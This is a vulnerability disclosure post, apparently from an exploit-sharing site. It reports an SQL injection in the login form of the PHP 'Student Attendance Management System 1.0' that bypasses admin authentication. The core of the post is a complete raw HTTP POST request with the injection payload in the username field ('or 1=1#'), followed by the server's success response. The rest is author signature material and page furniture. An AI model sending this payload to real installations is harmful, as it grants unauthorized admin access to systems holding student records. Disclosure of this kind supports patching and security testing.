Student Attendance Management System-1.0 Bypass Authentication SQLi - latest version

2024.06.22
bg nu11secur1ty (BG) bg
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

## Titles: Student Attendance Management System-1.0 Bypass Authentication SQLi ## Author: nu11secur1ty ## Date: 06/22/2024 ## Vendor: https://github.com/oretnom23 ## Software: https://www.sourcecodester.com/php/14561/student-attendance-management-system-using-phpmysqli-source-code.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter is not sanitizing well, the attacker can inject direct queries into the login form and easily bypass the authentication of the admin account. STATUS: CRITICAL- Vulnerability [+]Exploits: - Exploit: ```POST POST /student_attendance/ajax.php?action=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=2otv2s74md44qhb7do890mhhp4 Content-Length: 104 Sec-Ch-Ua: "Not/A)Brand";v="8", "Chromium";v="126" Accept-Language: en-US Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Platform: "Windows" Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/student_attendance/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=nu11secur1ty'+or+1%3D1%23&password=stupiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiid ``` [+]Response ```HTTP HTTP/1.1 200 OK Date: Sat, 22 Jun 2024 06:37:41 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 1 ``` ## Reproduce: [href](https://www.patreon.com/posts/student-system-1-106665723) ## Proof and Exploit: [href](https://www.patreon.com/posts/student-system-1-106665723) ## Time spent: 01:25:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top